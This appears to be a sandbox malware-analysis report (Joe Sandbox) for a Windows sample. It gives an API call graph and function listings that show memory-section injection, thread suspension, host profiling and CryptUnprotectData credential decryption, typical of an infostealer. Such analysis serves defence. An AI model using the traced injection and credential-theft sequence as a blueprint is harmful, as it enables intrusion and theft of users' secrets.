39692->39695 39700 6228b2 39693->39700 39701 622881 39693->39701 39694->39680 39702 622831 39694->39702 39695->39680 39703 62285e 39695->39703 39697 622957 ImageList_Draw SetBkMode SetWindowLongW 39696->39697 39698 622954 39696->39698 39697->39680 39698->39697 39699->39680 39713 6223af GetDlgItemTextW 39699->39713 39700->39680 39749 622145 27 API calls TranslatorGuardHandler 39700->39749 39705 622884 39701->39705 39706 622898 39701->39706 39745 6220bd 30 API calls TranslatorGuardHandler 39702->39745 39746 62267f 38 API calls TranslatorGuardHandler 39703->39746 39705->39680 39747 6217f2 63 API calls 39705->39747 39706->39680 39748 6222f7 16 API calls 2 library calls 39706->39748 39709 62283c 39709->39680 39714 622412 GetDlgItemTextW 39713->39714 39715 6223ec 39713->39715 39717 622424 39714->39717 39724 622441 39714->39724 39768 622145 27 API calls TranslatorGuardHandler 39715->39768 39769 6222f7 16 API calls 2 library calls 39717->39769 39718 6223f4 GetDlgItemTextW 39718->39714 39720 622666 39718->39720 39770 62ed28 6 API calls TranslatorGuardHandler 39720->39770 39721 62242b GetDlgItemTextW 39721->39720 39721->39724 39723 62248b GetFullPathNameW 39723->39720 39727 6224b7 39723->39727 39724->39723 39726 62246f SetDlgItemTextW 39724->39726 39725 622678 39726->39723 39727->39720 39728 6224e4 wsprintfW MessageBoxW 39727->39728 39729 622515 39727->39729 39728->39720 39728->39729 39729->39720 39752 621e09 7 API calls TranslatorGuardHandler 39729->39752 39731 62256e GetDlgItem SendMessageW 39732 62258d 39731->39732 39753 621240 8 API calls TranslatorGuardHandler 39732->39753 39734 6225a1 39754 621ce1 6 API calls TranslatorGuardHandler 39734->39754 39736 6225af _memset 39737 6225ca GetDlgItemTextW 39736->39737 39755 621c65 22 API calls 39737->39755 39739 6225e5 GetWindowLongW 39740 6225fa SetWindowLongW 39739->39740 39741 622608 GetDlgItem SendMessageW 39739->39741 39742 622607 39740->39742 39756 625b9a PathCanonicalizeW 39741->39756 39742->39741 39745->39709 39748->39680 39749->39680 39750->39709 39751->39680 39752->39731 39753->39734 39754->39736 39755->39739 39757 625bdc 39756->39757 39771 62ff0f 47 API calls 3 library calls 39757->39771 39759 625c13 _memset _strncpy 39760 625cb2 39759->39760 39761 625cc3 39759->39761 39788 6413b2 CreateThread 39760->39788 39772 624ff3 39761->39772 39764 625cbc 39765 625cc8 39764->39765 39789 62ed28 6 API calls TranslatorGuardHandler 39765->39789 39767 62264e SetWindowLongW SetTimer 39767->39720 39768->39718 39769->39721 39770->39725 39771->39759 39773 62503f 39772->39773 39778 6250d1 39773->39778 39787 625154 39773->39787 39817 62ff0f 47 API calls 3 library calls 39773->39817 39776 62518e 39776->39765 39777 6250b4 39818 629e34 68 API calls TranslatorGuardHandler 39777->39818 39790 627f26 6 API calls 2 library calls 39778->39790 39780 625126 39791 6240f9 39780->39791 39785 62513c 39786 624f32 152 API calls 39785->39786 39786->39787 39819 62ed28 6 API calls TranslatorGuardHandler 39787->39819 39788->39764 39789->39767 39790->39780 39792 62410f 39791->39792 39793 6242fa GetProcAddress 39792->39793 39794 624326 39793->39794 39795 624959 VirtualAlloc 39794->39795 39798 6249ad 39795->39798 39797 624d41 39799 624e14 39797->39799 39821 62e317 49 API calls 39797->39821 39820 627a0d 84 API calls 39798->39820 39799->39799 39824 626c9a 150 API calls 39799->39824 39801 624daa 39803 624db6 39801->39803 39822 623e41 150 API calls TranslatorGuardHandler 39803->39822 39805 624dee 39823 623e41 150 API calls TranslatorGuardHandler 39805->39823 39806 624e3b 39807 624ebd 39806->39807 39825 627a0d 84 API calls 39806->39825 39810 624f15 39807->39810 39827 62e317 49 API calls 39807->39827 39828 62ed28 6 API calls TranslatorGuardHandler 39810->39828 39813 624e99 39826 6274f3 80 API calls 39813->39826 39814 624f29 39816 625ce3 72 API calls TranslatorGuardHandler 39814->39816 39817->39777 39818->39778 39819->39776 39820->39797 39821->39801 39822->39805 39823->39799 39824->39806 39825->39813 39826->39807 39827->39810 39828->39814 39334 31e2916 39335 31e2923 39334->39335 39338 31e8940 39335->39338 39337 31e293d 39339 31e8960 39338->39339 39342 320b1a0 39339->39342 39341 31e89b9 39343 320b1c0 39342->39343 39344 320b30e 39343->39344 39346 3208120 LdrInitializeThunk 39343->39346 39344->39341 39346->39344 39347 31e2f17 39350 31e2f20 39347->39350 39351 31ead10 39350->39351 39352 31ead71 39351->39352 39355 31eaff0 39352->39355 39358 320afe0 39355->39358 39357 31eb049 39360 320b000 39358->39360 39359 320b14e 39359->39357 39360->39359 39362 3208120 LdrInitializeThunk 39360->39362 39362->39359 39363 3207b2c 39364 3207bb1 LoadLibraryExW 39363->39364 39365 3207b6e 39363->39365 39366 3207bbf 39364->39366 39365->39364 39367 31e9f12 39368 31ea023 39367->39368 39371 31e5e60 39368->39371 39372 31e5e80 39371->39372 39372->39372 39373 320afe0 LdrInitializeThunk 39372->39373 39374 31e5f3e 39373->39374 39379 31f060c 39380 31f0794 39379->39380 39383 320b810 39380->39383 39384 320b830 39383->39384 39384->39384 39385 31f07f6 39384->39385 39387 3208120 LdrInitializeThunk 39384->39387 39387->39385 39840 31e828d 39841 31e5e60 LdrInitializeThunk 39840->39841 39842 31e8299 39841->39842 39843 31e738b 39844 31e73c9 39843->39844 39845 31e5e60 LdrInitializeThunk 39844->39845 39846 31e7438 39845->39846 39847 31e5e60 LdrInitializeThunk 39846->39847 39848 31e7503 39847->39848 39849 31e5e60 LdrInitializeThunk 39848->39849 39850 31e7612 39849->39850 39851 31e5e60 LdrInitializeThunk 39850->39851 39852 31e76d3 39851->39852 39853 31e2087 39854 31e2094 39853->39854 39857 31e61e0 39854->39857 39856 31e20ab 39858 31e6200 39857->39858 39858->39858 39859 320afe0 LdrInitializeThunk 39858->39859 39860 31e63ba 39859->39860 39388 31d2107 39391 31d3060 39388->39391 39392 31d204e 39391->39392 39393 31d3074 39391->39393 39393->39392 39399 3205f22 RtlAllocateHeap 39393->39399 39394 31d30d9 39394->39392 39395 31d32cd 39394->39395 39398 3205f22 RtlAllocateHeap 39394->39398 39395->39392 39397 3206022 RtlFreeHeap 39395->39397 39397->39392 39398->39395 39400 2d904c7 39401 2d904d5 39400->39401 39414 2d90e17 39401->39414 39403 2d9066d GetPEB 39405 2d906ea 39403->39405 39404 2d90628 39404->39403 39412 2d9095b 39404->39412 39417 2d90bd7 39405->39417 39408 2d9074b CreateThread 39409 2d90723 39408->39409 39428 2d90a87 GetPEB 39408->39428 39409->39412 39425 2d910d7 GetPEB 39409->39425 39411 2d90bd7 4 API calls 39411->39412 39413 2d907a5 39413->39411 39413->39412 39426 2d90e37 GetPEB 39414->39426 39416 2d90e24 39416->39404 39418 2d90bed CreateToolhelp32Snapshot 39417->39418 39420 2d9071d 39418->39420 39421 2d90c24 Thread32First 39418->39421 39420->39408 39420->39409 39421->39420 39422 2d90c4b 39421->39422 39422->39420 39423 2d90c82 Wow64SuspendThread 39422->39423 39424 2d90cac FindCloseChangeNotification 39422->39424 39423->39424 39424->39422 39425->39413 39427 2d90e52 39426->39427 39427->39416 39431 2d90ae0 39428->39431 39429 2d90b40 CreateThread 39429->39431 39432 2d912b7 39429->39432 39430 2d90b8d 39431->39429 39431->39430 39433 2d912bd 39432->39433 39435 2d912c7 39433->39435 39436 2d912cf 39435->39436 39436->39436 39439 2ddf2ab 39436->39439 39440 2ddf3ba 39439->39440 39441 2ddf2d0 39439->39441 39451 2de0586 39440->39451 39472 2de1b2d 39441->39472 39444 2d912eb 39444->39433 39445 2ddf2e8 39445->39444 39446 2de1b2d LoadLibraryA 39445->39446 39447 2ddf32a 39446->39447 39448 2de1b2d LoadLibraryA 39447->39448 39449 2ddf346 39448->39449 39450 2de1b2d LoadLibraryA 39449->39450 39450->39444 39452 2de1b2d LoadLibraryA 39451->39452 39453 2de05a9 39452->39453 39454 2de1b2d LoadLibraryA 39453->39454 39455 2de05c1 39454->39455 39456 2de1b2d LoadLibraryA 39455->39456 39457 2de05df 39456->39457 39458 2de0608 39457->39458 39459 2de05f4 VirtualAlloc 39457->39459 39458->39444 39459->39458 39461 2de0622 39459->39461 39460 2de1b2d LoadLibraryA 39463 2de06a0 39460->39463 39461->39458 39461->39460 39462 2de06f6 39462->39458 39464 2de1b2d LoadLibraryA 39462->39464 39465 2de0758 39462->39465 39463->39458 39463->39462 39476 2de1934 39463->39476 39464->39462 39465->39458 39471 2de07ba 39465->39471 39502 2ddf716 LoadLibraryA 39465->39502 39468 2de07a3 39468->39458 39503 2ddf811 LoadLibraryA 39468->39503 39471->39458 39480 2de0cb6 39471->39480 39473 2de1b44 39472->39473 39474 2de1b6b 39473->39474 39506 2ddfc32 LoadLibraryA 39473->39506 39474->39445 39477 2de1949 39476->39477 39478 2de19bf LoadLibraryA 39477->39478 39479 2de19c9 39477->39479 39478->39479 39479->39463 39481 2de0cf1 39480->39481 39482 2de0d38 NtCreateSection 39481->39482 39483 2de0d5d 39481->39483 39501 2de1365 39481->39501 39482->39483 39482->39501 39484 2de0df2 NtMapViewOfSection 39483->39484 39483->39501 39491 2de0e12 39484->39491 39485 2de113b VirtualAlloc 39496 2de117d 39485->39496 39486 2de1934 LoadLibraryA 39486->39491 39487 2de1934 LoadLibraryA 39488 2de1099 39487->39488 39488->39485 39488->39487 39490 2de1137 39488->39490 39504 2de19d2 LoadLibraryA 39488->39504 39489 2de122e VirtualProtect 39492 2de124e 39489->39492 39493 2de12f9 VirtualProtect 39489->39493 39490->39485 39491->39486 39491->39488 39494 2de19d2 LoadLibraryA 39491->39494 39491->39501 39492->39493 39500 2de12d3 VirtualProtect 39492->39500 39495 2de1328 39493->39495 39494->39491 39495->39501 39505 2de16e7 LoadLibraryA 39495->39505 39496->39489 39498 2de121b NtMapViewOfSection 39496->39498 39496->39501 39498->39489 39498->39501 39500->39492 39501->39458 39502->39468 39503->39471 39504->39488 39505->39501 39506->39473 39861 62f4c2 39907 6342ba GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 39861->39907 39863 62f4c7 __getstream 39908 63325b GetStartupInfoW 39863->39908 39865 62f4dd 39866 633a58 GetProcessHeap 39865->39866 39867 62f4ed 39866->39867 39868 62f4f8 39867->39868 39869 62f5ae 46 API calls 39867->39869 39870 6339c5 85 API calls 39868->39870 39869->39868 39871 62f4fe 39870->39871 39872 62f509 __RTC_Initialize 39871->39872 39873 62f5ae 46 API calls 39871->39873 39874 633a6d 50 API calls 39872->39874 39873->39872 39875 62f518 39874->39875 39876 62f524 GetCommandLineA 39875->39876 39877 62f5ae 46 API calls 39875->39877 39878 634396 51 API calls 39876->39878 39879 62f523 39877->39879 39880 62f534 39878->39880 39879->39876 39881 633d18 __setargv 73 API calls 39880->39881 39882 62f53e 39881->39882 39883 62f542 39882->39883 39884 62f54a 39882->39884 39885 632bf0 __lock 46 API calls 39883->39885 39886 633f58 72 API calls 39884->39886 39887 62f549 39885->39887 39888 62f54f 39886->39888 39887->39884 39889 62f553 39888->39889 39890 62f55b 39888->39890 39892 632bf0 __lock 46 API calls 39889->39892 39891 632c0a 50 API calls 39890->39891 39894 62f562 39891->39894 39893 62f55a 39892->39893 39893->39890 39895 62f567 39894->39895 39896 62f56e 39894->39896 39897 632bf0 __lock 46 API calls 39895->39897 39898 63441b 72 API calls 39896->39898 39899 62f56d 39897->39899 39900 62f573 39898->39900 39899->39896 39901 622bb3 26 API calls 39900->39901 39902 62f581 39901->39902 39903 632e6b 46 API calls 39902->39903 39904 62f58a 39903->39904 39905 6335fd 46 API calls 39904->39905 39906 62f59b 39905->39906 39907->39863 39909 31d32bc 39914 3205f22 RtlAllocateHeap 39909->39914 39910 31d32cd 39911 31d32f2 39910->39911 39912 3206022 RtlFreeHeap 39910->39912 39912->39911 39915 3208a85 39916 3208a80 39915->39916 39916->39915 39919 3208a8e 39916->39919 39922 3208120 LdrInitializeThunk 39916->39922 39918 3208b6e 39919->39918 39921 3208120 LdrInitializeThunk 39919->39921 39921->39918 39922->39919 39923 3208085 39924 32080e3 RtlReAllocateHeap 39923->39924 39925 32080ac 39923->39925 39926 320810c 39924->39926 39925->39924 39507 31ef730 39508 31ef742 39507->39508 39511 320b950 39508->39511 39510 31ef770 39513 320b983 39511->39513 39512 320b9ee 39516 320bade 39512->39516 39518 3208120 LdrInitializeThunk 39512->39518 39513->39512 39517 3208120 LdrInitializeThunk 39513->39517 39516->39510 39517->39512 39518->39516 39927 3203d8f 39930 320a3d0 39927->39930 39929 3203db5 GetVolumeInformationW 39931 320a413 39930->39931 39528 31e7829 39531 31e8320 39528->39531 39532 31e83cd 39531->39532 39532->39532 39533 31ead10 LdrInitializeThunk 39532->39533 39534 31e87d9 39533->39534 39936 31f68a1 39938 31f68be 39936->39938 39937 31f699b FreeLibrary 39939 31f69aa 39937->39939 39938->39937 39938->39938 39940 31f69ba GetComputerNameExA 39939->39940 39942 31f6a30 39940->39942 39941 31f6adb GetComputerNameExA 39943 31f6b4b 39941->39943 39942->39941 39942->39942 39545 31fb05f 39548 31df9c0 39545->39548 39547 31fb064 SysAllocString 39548->39547 39947 3207be5 GetLogicalDrives 39948 3207bfa 39947->39948 39949 31e6fd2 39951 31e6fe0 39949->39951 39950 31e7180 CryptUnprotectData 39951->39950 39549 31ea650 39550 31ea65e 39549->39550 39554 31ea6a0 39549->39554 39550->39550 39555 31ea760 39550->39555 39552 31ea71c 39553 31e8af0 LdrInitializeThunk 39552->39553 39552->39554 39553->39554 39556 31ea7bb 39555->39556 39557 320b1a0 LdrInitializeThunk 39556->39557 39558 31ea8bd 39557->39558 39571 31e9a4a 39573 31e9b22 39571->39573 39572 31e5e60 LdrInitializeThunk 39574 31e9b81 39572->39574 39573->39572 39575 31e5e60 LdrInitializeThunk 39574->39575 39576 31e9d44 39575->39576 39577 31e5e60 LdrInitializeThunk 39576->39577 39578 31e9ec9 39577->39578 39952 31e0fca 39955 31fe9a0 39952->39955 39956 31fe9d6 KiUserCallbackDispatcher 39955->39956 39957 31fe9ff DeleteObject 39956->39957 39959 31fea7e SelectObject 39957->39959 39961 31feb1a SelectObject 39959->39961 39962 31feb43 DeleteObject 39961->39962 39964 31e82ca 39965 3204000 LdrInitializeThunk 39964->39965 39967 31e8270 39965->39967 39966 3204000 LdrInitializeThunk 39966->39967 39967->39964 39967->39966 39968 31e0bc6 39969 31e0bf9 39968->39969 39991 31d2a90 39969->39991 39971 31e0ce8 39972 31edeb0 LdrInitializeThunk 39971->39972 39973 31e0cfd 39972->39973 39974 31ee6b0 LdrInitializeThunk 39973->39974 39975 31e0d16 39974->39975 39976 31ee910 LdrInitializeThunk 39975->39976 39977 31e0d32 39976->39977 39978 31f1020 LdrInitializeThunk 39977->39978 39979 31e0d57 39978->39979 39980 31f14d0 LdrInitializeThunk 39979->39980 39981 31e0d60 39980->39981 39982 31fe780 6 API calls 39981->39982 39983 31e0da1 39982->39983 39984 31d2a90 RtlFreeHeap 39983->39984 39985 31edeb0 LdrInitializeThunk 39983->39985 39986 31ee6b0 LdrInitializeThunk 39983->39986 39987 31ee910 LdrInitializeThunk 39983->39987 39988 31f1020 LdrInitializeThunk 39983->39988 39989 31f14d0 LdrInitializeThunk 39983->39989 39990 31fe780 6 API calls 39983->39990 39984->39983 39985->39983 39986->39983 39987->39983 39988->39983 39989->39983 39990->39983 39992 31d2a9e 39991->39992 39993 31d2ba7 39991->39993 39994 31d2b6e 39992->39994 39995 31d2af3 39992->39995 39997 31d2ab3 39992->39997 39994->39995 39996 31d2a90 RtlFreeHeap 39994->39996 40000 3206022 RtlFreeHeap 39995->40000 39996->39994 39997->39993 39997->39995 39998 31d2a90 RtlFreeHeap 39997->39998 39998->39997 40000->39993 39583 31d9240 39586 31d924b 39583->39586 39584 31d924f 39585 31d9294 ExitProcess 39584->39585 39586->39584 39587 31d925a 39586->39587 39595 31da320 39586->39595 39594 31d9265 39587->39594 39590 31d9292 39590->39585 39591 31d9261 39592 31d9284 39591->39592 39591->39594 39601 31dbe70 FreeLibrary 39592->39601 39602 3207fd0 FreeLibrary 39594->39602 39597 31da336 39595->39597 39596 31da4cf LoadLibraryExW 39600 31da509 39596->39600 39597->39596 39597->39597 39598 31da84d GetProcessVersion 39599 31da50d 39598->39599 39599->39591 39600->39598 39600->39599 39601->39594 39602->39590 39603 31ed140 39604 31ed19f 39603->39604 39605 31ed14c 39603->39605 39605->39605 39606 31ead10 LdrInitializeThunk 39605->39606 39606->39604 39607 3208843 39608 3208870 39607->39608 39608->39608 39609 32088ee 39608->39609 39611 3208120 LdrInitializeThunk 39608->39611 39611->39609 40005 31f40fa 40006 31f4108 40005->40006 40007 320afe0 LdrInitializeThunk 40006->40007 40008 31f41aa 40007->40008 40008->40008 40009 320afe0 LdrInitializeThunk 40008->40009 40009->40008 39616 31e5f75 39617 31e5f7f 39616->39617 39620 320b460 39617->39620 39622 320b493 39620->39622 39621 31e5f91 39623 320b50e 39622->39623 39626 3208120 LdrInitializeThunk 39622->39626 39623->39621 39627 3208120 LdrInitializeThunk 39623->39627 39626->39623 39627->39621 40010 31ef6f2 40011 320b810 LdrInitializeThunk 40010->40011 40012 31ef701 40011->40012 40013 320b810 LdrInitializeThunk 40012->40013 40014 31ef715 40013->40014 40015 31e64f3 40016 31e64f8 40015->40016 40016->40016 40017 320afe0 LdrInitializeThunk 40016->40017 40018 31e666d 40017->40018 39628 31ecb6c 39629 31ecb76 39628->39629 39633 31f0200 39629->39633 39637 31ecd50 39629->39637 39630 31ecbea 39634 31f0360 39633->39634 39635 31f0219 39633->39635 39634->39630 39636 31ead10 LdrInitializeThunk 39635->39636 39636->39634 39638 31ece20 39637->39638 39639 31ecd66 39637->39639 39638->39630 39639->39638 39640 320afe0 LdrInitializeThunk 39639->39640 39641 31ecefd 39640->39641 39644 31ecf3a 39641->39644 39649 3204000 39641->39649 39644->39638 39646 320b460 LdrInitializeThunk 39644->39646 39647 31ecf5c 39646->39647 39647->39638 39652 3208120 LdrInitializeThunk 39647->39652 39650 320afe0 LdrInitializeThunk 39649->39650 39651 3204022 39650->39651 39652->39638 39653 3208652 39655 320867b 39653->39655 39654 32086ee 39655->39654 39657 3208120 LdrInitializeThunk 39655->39657 39657->39654 40022 31e63eb 40023 31e63f8 40022->40023 40024 320b460 LdrInitializeThunk 40023->40024 40025 31e640a 40024->40025 39662 31f8967 39663 31f89ad 39662->39663 39664 31f8a72 GetPhysicallyInstalledSystemMemory 39663->39664 39665 31f8a97 39664->39665 39665->39665 40030 31e60e2 40032 31e610c 40030->40032 40031 31e617e 40032->40031 40034 3208120 LdrInitializeThunk 40032->40034 40034->40031

                  Executed Functions

                  Function 02DE0CB6 Relevance: 11.2, APIs: 7, Instructions: 730memorynativeCOMMON
                  Download Yara Rule
                  APIs
                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02DE0D4F
                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 02DE0DF7
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 02DE116B
                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02DE1220
                  • VirtualProtect.KERNELBASE(?,?,00000008,?,?,?,?,?,?,?), ref: 02DE123D
                  • VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 02DE12E0
                  • VirtualProtect.KERNELBASE(?,?,00000002,?,?,?,?,?,?,?), ref: 02DE1313
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$ProtectSection$View$AllocCreate
                  • String ID:
                  • API String ID: 2664363762-0
                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                  • Instruction ID: b5d1323398dfc4fa876ef22a6136d47da21a631fdb64ff9bc065e763220cdde9
                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                  • Instruction Fuzzy Hash: 7C426A71608341AFDB24EF24C844B6AB7E9EF88714F14492DF99A9B351E770EC44CB92
                  Function 00623599 Relevance: 8.7, APIs: 3, Strings: 1, Instructions: 1726librarymemoryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetModuleHandleW.KERNEL32(s+b,-00000001B9B1873E,?,-000000016E27A8A4,4180F73C,00000000,?,s+b,C:\Users\user\Desktop\6RVmzn1DzL.ini,00622B73,?,AllowMultipleInstances,00000001), ref: 00623A0B
                  • GetProcAddress.KERNEL32(00000000,s+b), ref: 0062430A
                  • VirtualAlloc.KERNELBASE(A58EE3AB,00052096,-F9A71287,-804A4EE4), ref: 00624986
                    • Part of subcall function 006278C4: _memset.LIBCMT ref: 006278E3
                    • Part of subcall function 0062753D: _memset.LIBCMT ref: 00627557
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _memset$AddressAllocHandleModuleProcVirtual
                  • String ID: s+b
                  • API String ID: 3046477526-2084237830
                  • Opcode ID: 8f828d79376b00db5bbabbf78764ff0dd1f5e3dd163e5c9372f61affff6fdf5c
                  • Instruction ID: ccdfc19d8b1d5daa0312b355cd2365a3ddcec1ae2178a648247af00193cd209e
                  • Opcode Fuzzy Hash: 8f828d79376b00db5bbabbf78764ff0dd1f5e3dd163e5c9372f61affff6fdf5c
                  • Instruction Fuzzy Hash: 55C249339007224FC798EFB5FCA616E33A3FB82302F42A62DE44297166DF3455458AC9
                  Function 00623E41 Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 1025librarymemoryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 678 623e41-624104 call 628c1f call 6378a8 call 6306f3 call 62c3f7 call 625b40 call 63734e call 63ca86 call 63aa4d call 634395 call 624ddc call 628fe9 call 638b0d call 627ba0 call 63dff8 call 637f2c call 624ddc call 6312e5 call 624fea call 63c189 call 62acac call 63d6eb call 638108 call 624ddc 725 62410f-624d0f call 626de9 call 624ddc call 635706 call 63d6eb call 631e0e call 624ddc * 2 call 62714f call 63565e call 63d6eb call 63d0d8 call 624ddc call 6287a3 call 633219 call 624ddc call 6257d3 call 624ddc call 62d380 call 63b554 call 63d8bd GetProcAddress call 629255 call 639e81 call 62cf9f call 63327c call 63e152 call 63bc81 call 6318f1 call 63387e call 63895a call 621fe4 call 621bb7 call 6296f3 call 621fe4 call 6312e5 call 63a492 call 62de2f call 6324d4 call 6282a7 call 62267e call 632afb call 635706 call 631e0e call 62f76a call 63b554 call 629255 call 635f6b call 62a734 call 63c964 call 638399 call 62ca99 call 62a58e call 6345e8 call 634fb7 call 633f57 call 62a58e call 63d191 call 625762 call 62f393 call 624ddc call 626de9 call 624ddc call 629791 call 62cc3e call 63877d call 624ddc call 6276fb call 63bc81 call 62b822 call 639dbb call 63af20 call 635f6b call 628c1f call 626de9 call 62fdbc call 6276fb call 6277e2 call 63d785 call 638b0d VirtualAlloc call 62da7e call 62f4c1 call 634d2e call 62a58e call 62e49e call 6287a3 call 629255 call 63b92c call 63c964 call 634719 call 629de5 call 624ddc call 626de9 call 63a8b2 call 62a949 call 634cc8 call 63a492 call 63734e call 63e6c4 call 639410 call 627ee1 call 62bf9a call 63b83f call 634b81 call 62b1fa call 62120a call 62cf9f call 638d64 call 6302f9 call 622e9c call 627ee1 call 62a58e call 63dff8 call 627ba0 call 6329b8 678->725 726 62410a call 62f4c1 678->726 953 624d11-624d33 call 6278c4 call 62753d call 6278c4 725->953 954 624d38-624d5d call 627a0d 725->954 726->725 953->954 962 624d79-624d85 954->962 963 624d5f-624d74 call 6278c4 954->963 966 624e14-624e19 962->966 967 624d8b-624db4 call 62e317 962->967 963->962 968 624e1c-624e27 966->968 974 624db6-624dc7 967->974 975 624dc9-624dd5 967->975 968->968 971 624e29-624e43 call 626c9a 968->971 978 624e53-624e68 971->978 979 624e45-624e4d 971->979 976 624dda-624df0 call 6210f5 call 623e41 974->976 975->976 991 624df3-624dfe 976->991 984 624e6a-624e82 call 62753d 978->984 985 624ebd-624ec7 978->985 979->978 994 624e90-624eb8 call 627a0d call 6278c4 call 6274f3 984->994 995 624e84-624e8b call 6278c4 984->995 987 624ed3-624ee8 call 626056 985->987 988 624ec9-624ece call 6278c4 985->988 1001 624f15-624f2f call 62ed28 987->1001 1002 624eea-624f10 call 62e317 987->1002 988->987 991->991 996 624e00-624e0f call 623e41 991->996 994->985 995->994 996->966 1002->1001
                  APIs
                  • GetProcAddress.KERNEL32(00000000,s+b), ref: 0062430A
                  • VirtualAlloc.KERNELBASE(A58EE3AB,00052096,-F9A71287,-804A4EE4), ref: 00624986
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AddressAllocProcVirtual
                  • String ID: s+b
                  • API String ID: 2770133467-2084237830
                  • Opcode ID: 81c194d84e037b8db3f48b311a342e97e9af4700b57937565eeee7631f211c16
                  • Instruction ID: cdcb939bea94e6d30f2283bec2c5fda38798b018671139d8879209331633adc4
                  • Opcode Fuzzy Hash: 81c194d84e037b8db3f48b311a342e97e9af4700b57937565eeee7631f211c16
                  • Instruction Fuzzy Hash: 0C7225379107224FD799EFB5ECA616E3363FBC2306F46A22DE44287166DF3444468AC9
                  Function 006240F9 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 994librarymemoryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1010 6240f9-624c5f call 62f4c1 call 626de9 call 624ddc call 635706 call 63d6eb call 631e0e call 624ddc * 2 call 62714f call 63565e call 63d6eb call 63d0d8 call 624ddc call 6287a3 call 633219 call 624ddc call 6257d3 call 624ddc call 62d380 call 63b554 call 63d8bd GetProcAddress call 629255 call 639e81 call 62cf9f call 63327c call 63e152 call 63bc81 call 6318f1 call 63387e call 63895a call 621fe4 call 621bb7 call 6296f3 call 621fe4 call 6312e5 call 63a492 call 62de2f call 6324d4 call 6282a7 call 62267e call 632afb call 635706 call 631e0e call 62f76a call 63b554 call 629255 call 635f6b call 62a734 call 63c964 call 638399 call 62ca99 call 62a58e call 6345e8 call 634fb7 call 633f57 call 62a58e call 63d191 call 625762 call 62f393 call 624ddc call 626de9 call 624ddc call 629791 call 62cc3e call 63877d call 624ddc call 6276fb call 63bc81 call 62b822 call 639dbb call 63af20 call 635f6b call 628c1f call 626de9 call 62fdbc call 6276fb call 6277e2 call 63d785 call 638b0d VirtualAlloc call 62da7e call 62f4c1 call 634d2e call 62a58e call 62e49e call 6287a3 call 629255 call 63b92c call 63c964 call 634719 call 629de5 call 624ddc call 626de9 call 63a8b2 call 62a949 call 634cc8 call 63a492 call 63734e call 63e6c4 call 639410 call 627ee1 call 62bf9a call 63b83f call 634b81 call 62b1fa call 62120a call 62cf9f call 638d64 call 6302f9 1226 624c64-624d0f call 622e9c call 627ee1 call 62a58e call 63dff8 call 627ba0 call 6329b8 1010->1226 1239 624d11-624d33 call 6278c4 call 62753d call 6278c4 1226->1239 1240 624d38-624d5d call 627a0d 1226->1240 1239->1240 1248 624d79-624d85 1240->1248 1249 624d5f-624d74 call 6278c4 1240->1249 1252 624e14-624e19 1248->1252 1253 624d8b-624db4 call 62e317 1248->1253 1249->1248 1254 624e1c-624e27 1252->1254 1260 624db6-624dc7 1253->1260 1261 624dc9-624dd5 1253->1261 1254->1254 1257 624e29-624e43 call 626c9a 1254->1257 1264 624e53-624e68 1257->1264 1265 624e45-624e4d 1257->1265 1262 624dda-624df0 call 6210f5 call 623e41 1260->1262 1261->1262 1277 624df3-624dfe 1262->1277 1270 624e6a-624e82 call 62753d 1264->1270 1271 624ebd-624ec7 1264->1271 1265->1264 1280 624e90-624eb8 call 627a0d call 6278c4 call 6274f3 1270->1280 1281 624e84-624e8b call 6278c4 1270->1281 1273 624ed3-624ee8 call 626056 1271->1273 1274 624ec9-624ece call 6278c4 1271->1274 1287 624f15-624f2f call 62ed28 1273->1287 1288 624eea-624f10 call 62e317 1273->1288 1274->1273 1277->1277 1282 624e00-624e0f call 623e41 1277->1282 1280->1271 1281->1280 1282->1252 1288->1287
                  APIs
                  • GetProcAddress.KERNEL32(00000000,s+b), ref: 0062430A
                  • VirtualAlloc.KERNELBASE(A58EE3AB,00052096,-F9A71287,-804A4EE4), ref: 00624986
